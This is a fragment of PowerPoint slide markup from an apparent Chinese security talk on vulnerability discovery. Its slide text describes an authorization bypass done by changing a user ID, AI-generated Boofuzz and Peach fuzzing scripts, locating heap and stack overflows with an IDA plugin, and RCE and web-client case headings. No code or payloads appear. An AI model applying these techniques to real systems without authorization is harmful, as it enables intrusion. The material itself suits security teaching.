              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="5842272" y="6045204"/>
              <a:ext cx="4778188" cy="302417"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="12" name="图片 11">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8DE357DB-2253-32F9-354B-3A286053C7D6}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId5"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="1906507" y="4280097"/>
              <a:ext cx="2404010" cy="2134760"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="13" name="直线箭头连接符 12">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9A9DAFAB-FB40-9D32-8FB8-29933DF87935}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4460208" y="2670331"/>
              <a:ext cx="1323794" cy="0"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="38100">
              <a:solidFill>
                <a:srgbClr val="00B0F0"/>
              </a:solidFill>
              <a:tailEnd type="triangle"/>
            </a:ln>
          </p:spPr>
          <p:style>
            <a:lnRef idx="3">
              <a:schemeClr val="accent4"/>
            </a:lnRef>
            <a:fillRef idx="0">
              <a:schemeClr val="accent4"/>
            </a:fillRef>
            <a:effectRef idx="2">
              <a:schemeClr val="accent4"/>
            </a:effectRef>
            <a:fontRef idx="minor">
              <a:schemeClr val="tx1"/>
            </a:fontRef>
          </p:style>
        </p:cxnSp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="15" name="直线箭头连接符 14">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AA021159-F524-048D-3163-59D637135ED1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="8" idx="2"/>
              <a:endCxn id="9" idx="0"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8231366" y="5509406"/>
              <a:ext cx="0" cy="535798"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="38100">
              <a:solidFill>
                <a:srgbClr val="00B0F0"/>
              </a:solidFill>
              <a:tailEnd type="triangle"/>
            </a:ln>
          </p:spPr>
          <p:style>
            <a:lnRef idx="3">
              <a:schemeClr val="accent4"/>
            </a:lnRef>
            <a:fillRef idx="0">
              <a:schemeClr val="accent4"/>
            </a:fillRef>
            <a:effectRef idx="2">
              <a:schemeClr val="accent4"/>
            </a:effectRef>
            <a:fontRef idx="minor">
              <a:schemeClr val="tx1"/>
            </a:fontRef>
          </p:style>
        </p:cxnSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16" name="文本框 15">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9A934630-6C4B-21CC-D3CC-288A6727FB05}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6831106" y="5522712"/>
              <a:ext cx="1045586" cy="575748"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>修改用户</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>ID10001</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B99CC590-CE52-B35C-9901-4E865AAFBBE3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8725784" y="5532130"/>
              <a:ext cx="1077122" cy="523220"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>变成用户</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>ID20002</a:t>
              </a:r>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18" name="左大括号 17">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F64738CA-B6B3-F67B-5589-A671E60321AD}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5360894" y="5069541"/>
              <a:ext cx="278801" cy="127808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A5C82B19-B92B-90B7-C711-199C73FEE911}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4552025" y="5029861"/>
              <a:ext cx="768935" cy="1384995"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>单击刷新按钮，成功实现越权查看用户信息。</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4234852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常规风险：缓冲区溢出</a:t>
            </a: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合 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{164E5914-DF86-42AC-C763-BAFAFAC9E958}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1460499" y="1607125"/>
            <a:ext cx="9653943" cy="4851639"/>
            <a:chOff x="521857" y="1004644"/>
            <a:chExt cx="11172272" cy="5614686"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="文本框 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9FA39DC9-8107-E4B1-1C79-C1009FB03B5D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5994047" y="1004644"/>
              <a:ext cx="5004569" cy="338554"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle>
              <a:defPPr>
                <a:defRPr lang="zh-CN"/>
              </a:defPPr>
              <a:lvl1pPr>
                <a:defRPr kumimoji="1" sz="1600">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
                <a:t>基于</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
                <a:t>ChatGPT</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
                <a:t>生成</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
                <a:t>Boofuzz</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
                <a:t>脚本，</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
                <a:t>Fuzz</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
                <a:t>本地端口服务</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="20" name="图片 19">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{77A450F0-31F0-4906-FDE4-8FDFACB8A100}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill rotWithShape="1">
            <a:blip r:embed="rId2"/>
            <a:srcRect l="-2119" t="-351" r="2119" b="351"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="5994047" y="1652099"/>
              <a:ext cx="5700082" cy="2905582"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="21" name="组合 20">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F400FA72-F0EE-4CD1-E62A-074F11879808}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="521857" y="1055774"/>
              <a:ext cx="5185264" cy="3501909"/>
              <a:chOff x="379047" y="1122283"/>
              <a:chExt cx="5185264" cy="3501909"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="23" name="文本框 22">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D2068DC9-798A-AC06-4D94-81ADA76B5FE1}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="379047" y="1122283"/>
                <a:ext cx="5185264" cy="676746"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="square">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle>
                <a:defPPr>
                  <a:defRPr lang="zh-CN"/>
                </a:defPPr>
                <a:lvl1pPr>
                  <a:defRPr kumimoji="1" sz="1600">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                    <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                    <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  </a:defRPr>
                </a:lvl1pPr>
              </a:lstStyle>
              <a:p>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
                  <a:t>通过</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
                  <a:t>IDA</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
                  <a:t>插件</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
                  <a:t>VulFi</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
                  <a:t>定位脆弱点，找到堆、栈溢出问题</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="24" name="图片 23">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{86D05A42-27DB-7FF7-AA5A-8C1D77E45413}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr>
                <a:picLocks noChangeAspect="1"/>
              </p:cNvPicPr>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId3"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="466135" y="2532636"/>
                <a:ext cx="4682233" cy="2091556"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="25" name="图片 24">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D4037E8D-E863-C1BD-DE2E-7C50AD1852EE}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr>
                <a:picLocks noChangeAspect="1"/>
              </p:cNvPicPr>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId4"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="466135" y="1789941"/>
                <a:ext cx="4682233" cy="616083"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </p:grpSp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="22" name="图片 21">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CDA915C3-E3D4-7E9F-FC69-303B70278403}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId5"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="2828922" y="4614809"/>
              <a:ext cx="5891741" cy="2004521"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="413121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常规风险：缓冲区溢出</a:t>
            </a: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5676356F-A64B-F5AB-0B6A-94D219E13040}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="984068" y="2203472"/>
            <a:ext cx="10483612" cy="3297465"/>
            <a:chOff x="676859" y="2333488"/>
            <a:chExt cx="10483612" cy="3297465"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="7" name="图片 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B7123EFB-E7E2-90A9-CF28-B1D574953645}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId2"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="676859" y="2333488"/>
              <a:ext cx="4997043" cy="2591659"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="8" name="图片 7">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{493FB2D0-3837-E742-3785-899E3F1ED881}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="6182840" y="2333488"/>
              <a:ext cx="4977631" cy="2591659"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="文本框 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A52F7A85-0084-023C-ABC2-B6D441DD5078}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="748709" y="5292399"/>
              <a:ext cx="10309931" cy="338554"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle>
              <a:defPPr>
                <a:defRPr lang="zh-CN"/>
              </a:defPPr>
              <a:lvl1pPr>
                <a:defRPr kumimoji="1" sz="1600">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
                <a:t>针对客户端特定文件格式，寻找公开样本，结合</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
                <a:t>GPT</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
                <a:t>或</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
                <a:t>IFFA</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
                <a:t>生成</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
                <a:t>Pits</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
                <a:t>脚本，通过</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
                <a:t>Peach</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
                <a:t>Fuzzer</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
                <a:t>进行模糊测试。</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="140944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
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本框 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8D855D6F-1D5B-FC98-7C74-97B32B72EA3B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3666565" y="2951946"/>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漏洞挖掘案例之</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" charset="-122"/>
                <a:cs typeface="Microsoft YaHei" charset="-122"/>
              </a:rPr>
              <a:t>RCE</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" charset="-122"/>
                <a:cs typeface="Microsoft YaHei" charset="-122"/>
              </a:rPr>
              <a:t>篇</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="7" name="组 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{82E7C504-8E71-FA8E-98D3-EBBC41A10B86}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5681330" y="3661198"/>
            <a:ext cx="1089088" cy="45719"/>
            <a:chOff x="3232298" y="1892595"/>
            <a:chExt cx="1089088" cy="53163"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="矩形 7">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AC8A9269-94BA-91F8-393E-C2871DAF2849}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>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F637DE2B-1A41-C5C4-30D0-813DE03EA2C1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>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321075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85800" y="788522"/>
            <a:ext cx="3187700" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-CN" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" charset="-122"/>
                <a:cs typeface="Microsoft YaHei" charset="-122"/>
              </a:rPr>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" charset="-122"/>
                <a:cs typeface="Microsoft YaHei" charset="-122"/>
              </a:rPr>
              <a:t>类客户端问题</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </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 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{85801D5C-8244-113F-A8D9-C0CF9844D1FF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="279400" y="877671"/>
            <a:ext cx="210961" cy="344922"/>
            <a:chOff x="0" y="369310"/>
            <a:chExt cx="210961" cy="344922"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="三角形 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4A943880-981E-AA20-0472-668FC888D219}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="5400000">
              <a:off x="-92886" y="462196"/>
              <a:ext cx="344922" cy="1591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20" name="三角形 19">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C76F2B24-A574-6552-8060-8EF196D4CDD8}"/>
                </a:ext>
